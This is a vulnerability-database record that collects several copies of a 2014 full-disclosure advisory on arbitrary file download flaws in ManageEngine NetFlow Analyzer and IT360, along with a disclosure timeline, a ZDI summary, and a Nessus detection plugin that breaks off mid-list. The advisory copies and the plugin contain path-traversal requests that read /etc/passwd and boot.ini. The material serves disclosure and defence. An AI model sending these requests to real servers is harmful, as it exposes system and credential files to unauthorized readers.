ID PACKETSTORM:129336 Type packetstorm Reporter Pedro Ribeiro Modified 2014-12-01T00:00:00
Description
`Hi,
This is part 9 of the ManageOwnage series. For previous parts see [1].
Today we have yet another 0 day - an arbitrary file download
vulnerability that be exploited unauthenticated in NetFlow Analyzer
and authenticated in IT360.
I'm releasing this as a 0 day because ManageEngine have been making a
fool out of me for 105 days. I have asked them "are you releasing a
fix soon?" at least a couple of times every month to which they always
responded "yes we will release in the next week/month". And then they
don't release the fix nor provide an explanation. See the advisory
timeline below for details.
An Metasploit auxiliary module that exploits this vulnerability has
been submitted to the Metasploit Framework Github repo in [2].
A full copy of the advisory below can be obtained from my repo in [3].
Regards,
Pedro
>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 30/11/2014 / Last updated: 30/11/2014
>> Background on the affected product:
"NetFlow Analyzer, a complete traffic analytics tool, leverages flow
technologies to provide real time visibility into the network
bandwidth performance. NetFlow Analyzer, primarily a bandwidth
monitoring tool, has been optimizing thousands of networks across the
World by giving holistic view about their network bandwidth and
traffic patterns. NetFlow Analyzer is a unified solution that
collects, analyzes and reports about what your network bandwidth is
being used for and by whom."
"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."
This is being released as a 0-day because ManageEngine have been
twiddling their thumbs (and making a fool out of me) for 105 days. See
timeline below for explanation.
>> Technical details:
Vulnerability: Arbitrary file download
Constraints: unauthenticated in NetFlow; authenticated in IT360
Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above
CVE-2014-5445:
GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true
CVE-2014-5446
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini
All 3 servlets can be exploited in both Windows and Linux. A
Metasploit module that exploits CVE-2014-5445 has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 105 days.
Timeline of disclosure:
18/08/2014
- Requested contact via ManageEngine Security Response Center.
19/08/2014
- Received contact from the NetFlow Analyzer support team. Responded
with the security advisory above detailing the vulnerabilities.
- Further back and forth explaining the vulnerabilities, how to
exploit them and their impact.
22/08/2014
- Requested information regarding the release date for the fix.
Received response "We do not have a ETA on this, I will check with our
engineering team and update you."
22/09/2014
- Requested information regarding the release date for the fix.
Received response "We expect that the new release will be within the
next couple of weeks".
20/10/2014
- Requested information regarding the release date for the fix.
Received response "Our new release will be happening early by next
week, you can get the update in our NetFlow Analyzer website".
- Asked if they are sure that the fix will be included in the new
release. Received response "yes you are correct, the issue that you
have specified is fixed in new release".
27/10/2014
- NetFlow Analyzer version 10.2 released - still vulnerable.
- Sent an email to ManageEngine asking if they are going to release a
fix soon. Received response "We will release the PPM file of the
upgrade soon, in which we have fixed the Vulnerability you mentioned".
5/11/2014
- Requested information regarding the release date for the fix.
Received response "You can expect the release before this month end".
28/11/2014
- Requested information regarding the release date for the fix.
Received response "The PPM file is in testing phase and will be
released in next Month".
- Asked if they can commit to a date. Received response "the ppm is in
testing phase now, as it is one of the major release, we will not be
able to give an exact date of release".
30/11/2014
- Realised that ManageEngine have been playing me for 105 days, and
immediately released advisory and exploit.
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
[2]
https://github.com/rapid7/metasploit-framework/pull/4282
[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt
`
{"id": "PACKETSTORM:129336", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ManageEngine Netflow Analyzer / IT360 File Download", "description": "", "published": "2014-12-01T00:00:00", "modified": "2014-12-01T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 5.0}, "href": "https://packetstormsecurity.com/files/129336/ManageEngine-Netflow-Analyzer-IT360-File-Download.html", "reporter": "Pedro Ribeiro", "references": [], "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "lastseen": "2016-12-05T22:17:21", "viewCount": 18, "enchantments": {"score": {"value": 6.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-2308", "CPAI-2014-2341"]}, {"type": "cve", "idList": ["CVE-2014-5445", "CVE-2014-5446"]}, {"type": "exploitdb", "idList": ["EDB-ID:43895"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:930FC2F9BB7DBE4909B00213945A3C4A"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/NETFLOW_FILE_DOWNLOAD"]}, {"type": "nessus", "idList": ["MANAGEENGINE_NETFLOW_CVE-2014-5446.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31473", "SECURITYVULNS:VULN:14133"]}, {"type": "zdi", "idList": ["ZDI-15-138"]}, {"type": "zdt", "idList": ["1337DAY-ID-22955", "1337DAY-ID-29645"]}], "rev": 4}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-2341"]}, {"type": "cve", "idList": ["CVE-2014-5445", "CVE-2014-5446"]}, {"type": "exploitdb", "idList": ["EDB-ID:43895"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:930FC2F9BB7DBE4909B00213945A3C4A"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14133"]}, {"type": "zdt", "idList": ["1337DAY-ID-22955"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://packetstormsecurity.com/files/download/129336/manageengine-filedownload.txt", "sourceData": "`Hi, \n \nThis is part 9 of the ManageOwnage series. For previous parts see [1]. \n \nToday we have yet another 0 day - an arbitrary file download \nvulnerability that be exploited unauthenticated in NetFlow Analyzer \nand authenticated in IT360. \nI'm releasing this as a 0 day because ManageEngine have been making a \nfool out of me for 105 days. I have asked them \"are you releasing a \nfix soon?\" at least a couple of times every month to which they always \nresponded \"yes we will release in the next week/month\". And then they \ndon't release the fix nor provide an explanation. See the advisory \ntimeline below for details. \n \nAn Metasploit auxiliary module that exploits this vulnerability has \nbeen submitted to the Metasploit Framework Github repo in [2]. \n \nA full copy of the advisory below can be obtained from my repo in [3]. \n \nRegards, \nPedro \n \n>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \nDisclosure: 30/11/2014 / Last updated: 30/11/2014 \n \n>> Background on the affected product: \n\"NetFlow Analyzer, a complete traffic analytics tool, leverages flow \ntechnologies to provide real time visibility into the network \nbandwidth performance. NetFlow Analyzer, primarily a bandwidth \nmonitoring tool, has been optimizing thousands of networks across the \nWorld by giving holistic view about their network bandwidth and \ntraffic patterns. NetFlow Analyzer is a unified solution that \ncollects, analyzes and reports about what your network bandwidth is \nbeing used for and by whom.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \nThis is being released as a 0-day because ManageEngine have been \ntwiddling their thumbs (and making a fool out of me) for 105 days. See \ntimeline below for explanation. \n \n \n>> Technical details: \nVulnerability: Arbitrary file download \nConstraints: unauthenticated in NetFlow; authenticated in IT360 \nAffected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above \n \nCVE-2014-5445: \nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd \nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\\\boot.ini&pdf=true \n \nCVE-2014-5446 \nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini \n \nAll 3 servlets can be exploited in both Windows and Linux. A \nMetasploit module that exploits CVE-2014-5445 has been released. \n \n \n>> Fix: \nUNFIXED - ManageEngine failed to take action after 105 days. \n \nTimeline of disclosure: \n18/08/2014 \n- Requested contact via ManageEngine Security Response Center. \n \n19/08/2014 \n- Received contact from the NetFlow Analyzer support team. Responded \nwith the security advisory above detailing the vulnerabilities. \n- Further back and forth explaining the vulnerabilities, how to \nexploit them and their impact. \n \n22/08/2014 \n- Requested information regarding the release date for the fix. \nReceived response \"We do not have a ETA on this, I will check with our \nengineering team and update you.\" \n \n22/09/2014 \n- Requested information regarding the release date for the fix. \nReceived response \"We expect that the new release will be within the \nnext couple of weeks\". \n \n20/10/2014 \n- Requested information regarding the release date for the fix. \nReceived response \"Our new release will be happening early by next \nweek, you can get the update in our NetFlow Analyzer website\". \n- Asked if they are sure that the fix will be included in the new \nrelease. Received response \"yes you are correct, the issue that you \nhave specified is fixed in new release\". \n \n27/10/2014 \n- NetFlow Analyzer version 10.2 released - still vulnerable. \n- Sent an email to ManageEngine asking if they are going to release a \nfix soon. Received response \"We will release the PPM file of the \nupgrade soon, in which we have fixed the Vulnerability you mentioned\". \n \n5/11/2014 \n- Requested information regarding the release date for the fix. \nReceived response \"You can expect the release before this month end\". \n \n28/11/2014 \n- Requested information regarding the release date for the fix. \nReceived response \"The PPM file is in testing phase and will be \nreleased in next Month\". \n- Asked if they can commit to a date. Received response \"the ppm is in \ntesting phase now, as it is one of the major release, we will not be \nable to give an exact date of release\". \n \n30/11/2014 \n- Realised that ManageEngine have been playing me for 105 days, and \nimmediately released advisory and exploit. \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \nhttp://seclists.org/fulldisclosure/2014/Nov/12 \nhttp://seclists.org/fulldisclosure/2014/Nov/18 \nhttp://seclists.org/fulldisclosure/2014/Nov/21 \n \n[2] \nhttps://github.com/rapid7/metasploit-framework/pull/4282 \n \n[3] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"zdt": [{"lastseen": "2018-03-17T03:11:14", "description": "ManageEngine Netflow Analyzer and IT360 suffer from an arbitrary file download vulnerability.", "cvss3": {}, "published": "2014-12-02T00:00:00", "type": "zdt", "title": "ManageEngine Netflow Analyzer / IT360 File Download Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "modified": "2014-12-02T00:00:00", "id": "1337DAY-ID-22955", "href": "https://0day.today/exploit/description/22955", "sourceData": "This is part 9 of the ManageOwnage series. For previous parts see [1].\r\n\r\nToday we have yet another 0 day - an arbitrary file download\r\nvulnerability that be exploited unauthenticated in NetFlow Analyzer\r\nand authenticated in IT360.\r\nI'm releasing this as a 0 day because ManageEngine have been making a\r\nfool out of me for 105 days. I have asked them \"are you releasing a\r\nfix soon?\" at least a couple of times every month to which they always\r\nresponded \"yes we will release in the next week/month\". And then they\r\ndon't release the fix nor provide an explanation. See the advisory\r\ntimeline below for details.\r\n\r\nAn Metasploit auxiliary module that exploits this vulnerability has\r\nbeen submitted to the Metasploit Framework Github repo in [2].\r\n\r\nA full copy of the advisory below can be obtained from my repo in [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 30/11/2014 / Last updated: 30/11/2014\r\n\r\n>> Background on the affected product:\r\n\"NetFlow Analyzer, a complete traffic analytics tool, leverages flow\r\ntechnologies to provide real time visibility into the network\r\nbandwidth performance. NetFlow Analyzer, primarily a bandwidth\r\nmonitoring tool, has been optimizing thousands of networks across the\r\nWorld by giving holistic view about their network bandwidth and\r\ntraffic patterns. NetFlow Analyzer is a unified solution that\r\ncollects, analyzes and reports about what your network bandwidth is\r\nbeing used for and by whom.\"\r\n\r\n\"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration.\"\r\n\r\nThis is being released as a 0-day because ManageEngine have been\r\ntwiddling their thumbs (and making a fool out of me) for 105 days. See\r\ntimeline below for explanation.\r\n\r\n\r\n>> Technical details:\r\nVulnerability: Arbitrary file download\r\nConstraints: unauthenticated in NetFlow; authenticated in IT360\r\nAffected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above\r\n\r\nCVE-2014-5445:\r\nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd\r\nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\\\boot.ini&pdf=true\r\n\r\nCVE-2014-5446\r\nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini\r\n\r\nAll 3 servlets can be exploited in both Windows and Linux. A\r\nMetasploit module that exploits CVE-2014-5445 has been released.\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 105 days.\r\n\r\nTimeline of disclosure:\r\n18/08/2014\r\n- Requested contact via ManageEngine Security Response Center.\r\n\r\n19/08/2014\r\n- Received contact from the NetFlow Analyzer support team. Responded\r\nwith the security advisory above detailing the vulnerabilities.\r\n- Further back and forth explaining the vulnerabilities, how to\r\nexploit them and their impact.\r\n\r\n22/08/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response \"We do not have a ETA on this, I will check with our\r\nengineering team and update you.\"\r\n\r\n22/09/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response \"We expect that the new release will be within the\r\nnext couple of weeks\".\r\n\r\n20/10/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response \"Our new release will be happening early by next\r\nweek, you can get the update in our NetFlow Analyzer website\".\r\n- Asked if they are sure that the fix will be included in the new\r\nrelease. Received response \"yes you are correct, the issue that you\r\nhave specified is fixed in new release\".\r\n\r\n27/10/2014\r\n- NetFlow Analyzer version 10.2 released - still vulnerable.\r\n- Sent an email to ManageEngine asking if they are going to release a\r\nfix soon. Received response \"We will release the PPM file of the\r\nupgrade soon, in which we have fixed the Vulnerability you mentioned\".\r\n\r\n5/11/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response \"You can expect the release before this month end\".\r\n\r\n28/11/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response \"The PPM file is in testing phase and will be\r\nreleased in next Month\".\r\n- Asked if they can commit to a date. Received response \"the ppm is in\r\ntesting phase now, as it is one of the major release, we will not be\r\nable to give an exact date of release\".\r\n\r\n30/11/2014\r\n- Realised that ManageEngine have been playing me for 105 days, and\r\nimmediately released advisory and exploit.\n\n# 0day.today [2018-03-17] #", "sourceHref": "https://0day.today/exploit/22955", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-10T02:06:46", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29645", "href": "https://0day.today/exploit/description/29645", "sourceData": ">> Arbitrary file download in ManageEngine Netflow Analyzer and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 30/11/2014 / Last updated: 3/12/2014\r\n \r\n>> Background on the affected product:\r\n\"NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\nThis is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation.\r\n \r\n \r\n>> Technical details:\r\nVulnerability: Arbitrary file download\r\nConstraints: unauthenticated in NetFlow; authenticated in IT360\r\nAffected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above\r\n \r\nCVE-2014-5445:\r\nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd\r\nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\\\boot.ini&pdf=true\r\n \r\nCVE-2014-5446\r\nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini\r\n \r\nAll 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released.\r\n \r\n \r\n>> Fix: \r\nUNFIXED - ManageEngine failed to take action after 105 days.\r\n \r\nTimeline of disclosure:\r\n18/08/2014\r\n- Requested contact via ManageEngine Security Response Center.\r\n \r\n19/08/2014\r\n- Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities.\r\n- Further back and forth explaining the vulnerabilities, how to exploit them and their impact.\r\n \r\n22/08/2014\r\n- Requested information regarding the release date for the fix. Received response \"We do not have a ETA on this, I will check with our engineering team and update you.\"\r\n \r\n22/09/2014\r\n- Requested information regarding the release date for the fix. Received response \"We expect that the new release will be within the next couple of weeks\".\r\n \r\n20/10/2014\r\n- Requested information regarding the release date for the fix. Received response \"Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website\".\r\n- Asked if they are sure that the fix will be included in the new release. Received response \"yes you are correct, the issue that you have specified is fixed in new release\".\r\n \r\n27/10/2014\r\n- NetFlow Analyzer version 10.2 released - still vulnerable. \r\n- Sent an email to ManageEngine asking if they are going to release a fix soon. Received response \"We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned\".\r\n \r\n5/11/2014\r\n- Requested information regarding the release date for the fix. Received response \"You can expect the release before this month end\".\r\n \r\n28/11/2014\r\n- Requested information regarding the release date for the fix. Received response \"The PPM file is in testing phase and will be released in next Month\".\r\n- Asked if they can commit to a date. Received response \"the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release\".\r\n \r\n30/11/2014\r\n- Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit.\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/29645", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine Netflow Analyzer IT360 - Arbitrary File Download", "edition": 2, "cvss3": {}, "published": "2014-12-03T00:00:00", "title": "ManageEngine Netflow Analyzer IT360 - Arbitrary File Download", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "modified": "2014-12-03T00:00:00", "id": "EXPLOITPACK:930FC2F9BB7DBE4909B00213945A3C4A", "href": "", "sourceData": ">> Arbitrary file download in ManageEngine Netflow Analyzer and IT360\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n==========================================================================\nDisclosure: 30/11/2014 / Last updated: 3/12/2014\n\n>> Background on the affected product:\n\"NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom.\"\n\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\n\nThis is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation.\n\n\n>> Technical details:\nVulnerability: Arbitrary file download\nConstraints: unauthenticated in NetFlow; authenticated in IT360\nAffected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above\n\nCVE-2014-5445:\nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd\nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\\\boot.ini&pdf=true\n\nCVE-2014-5446\nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini\n\nAll 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released.\n\n\n>> Fix: \nUNFIXED - ManageEngine failed to take action after 105 days.\n\nTimeline of disclosure:\n18/08/2014\n- Requested contact via ManageEngine Security Response Center.\n\n19/08/2014\n- Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities.\n- Further back and forth explaining the vulnerabilities, how to exploit them and their impact.\n\n22/08/2014\n- Requested information regarding the release date for the fix. Received response \"We do not have a ETA on this, I will check with our engineering team and update you.\"\n\n22/09/2014\n- Requested information regarding the release date for the fix. Received response \"We expect that the new release will be within the next couple of weeks\".\n\n20/10/2014\n- Requested information regarding the release date for the fix. Received response \"Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website\".\n- Asked if they are sure that the fix will be included in the new release. Received response \"yes you are correct, the issue that you have specified is fixed in new release\".\n\n27/10/2014\n- NetFlow Analyzer version 10.2 released - still vulnerable. \n- Sent an email to ManageEngine asking if they are going to release a fix soon. Received response \"We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned\".\n\n5/11/2014\n- Requested information regarding the release date for the fix. Received response \"You can expect the release before this month end\".\n\n28/11/2014\n- Requested information regarding the release date for the fix. Received response \"The PPM file is in testing phase and will be released in next Month\".\n- Asked if they can commit to a date. Received response \"the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release\".\n\n30/11/2014\n- Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit.\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2022-01-31T21:14:50", "description": "This vulnerability allows remote attackers to disclose files on vulnerable installations of ManageEngine NetFlow Analyzer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of input to the CReportPDFServlet servlet. The issue lies in the failure to perform any validation of the input filename. A remote attacker can exploit this vulnerability to disclose files from the system.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine NetFlow Analyzer CReportPDFServlet schFilePath Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5445", "CVE-2014-5446"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-138", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-138/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2022-04-12T15:48:24", "description": "ManageEngine NetFlow Analyzer prior to version 10 build 10250 is affected by the following directory traversal vulnerabilities :\n\n - User input to the 'schFilePath' parameter to CVSServlet or CReportPDFServlet is not properly sanitized. A remote attacker, using a specially crafted request, can exploit this to gain access to files outside of a restricted path. (CVE-2014-5445)\n\n - User input to the 'filename' parameter to servlet DisplayChartPDF is not properly sanitized. A remote attacker, using a specially crafted request, can exploit this to gain access to files outside of a restricted path. (CVE-2014-5446)", "cvss3": {"score": null, "vector": null}, "published": "2015-03-16T00:00:00", "type": "nessus", "title": "ManageEngine NetFlow Analyzer Multiple Path Traversal and File Access", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5445", "CVE-2014-5446"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:manageengine:netflow_analyzer"], "id": "MANAGEENGINE_NETFLOW_CVE-2014-5446.NASL", "href": "https://www.tenable.com/plugins/nessus/81821", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81821);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-5445\", \"CVE-2014-5446\");\n script_bugtraq_id(71404);\n\n script_name(english:\"ManageEngine NetFlow Analyzer Multiple Path Traversal and File Access\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by directory traversal\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"ManageEngine NetFlow Analyzer prior to version 10 build 10250 is\naffected by the following directory traversal vulnerabilities :\n\n - User input to the 'schFilePath' parameter to CVSServlet\n or CReportPDFServlet is not properly sanitized. A remote\n attacker, using a specially crafted request, can exploit\n this to gain access to files outside of a restricted\n path. (CVE-2014-5445)\n\n - User input to the 'filename' parameter to servlet\n DisplayChartPDF is not properly sanitized. A remote\n attacker, using a specially crafted request, can exploit\n this to gain access to files outside of a restricted\n path. (CVE-2014-5446)\");\n # https://packetstormsecurity.com/files/129336/ManageEngine-Netflow-Analyzer-IT360-File-Download.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9899d210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.manageengine.com/products/netflow/service-packs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to version 10 build 10250 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:manageengine:netflow_analyzer\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_netflow_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine NetFlow Analyzer\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\n\napp = \"ManageEngine NetFlow Analyzer\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8080);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\nurl = build_url(port:port,qs:dir);\n\nvectors = make_list(\n \"DisplayChartPDF?filename=../../../../Windows/WindowsShell.Manifest\",\n \"DisplayChartPDF?filename=../../../../etc/passwd\",\n \"CReportPDFServlet?pdf=true&schFilePath=\\Windows\\WindowsShell.Manifest\",\n \"CReportPDFServlet?pdf=true&schFilePath=/etc/passwd\",\n \"CSVServlet?schFilePath=\\Windows\\WindowsShell.Manifest\",\n 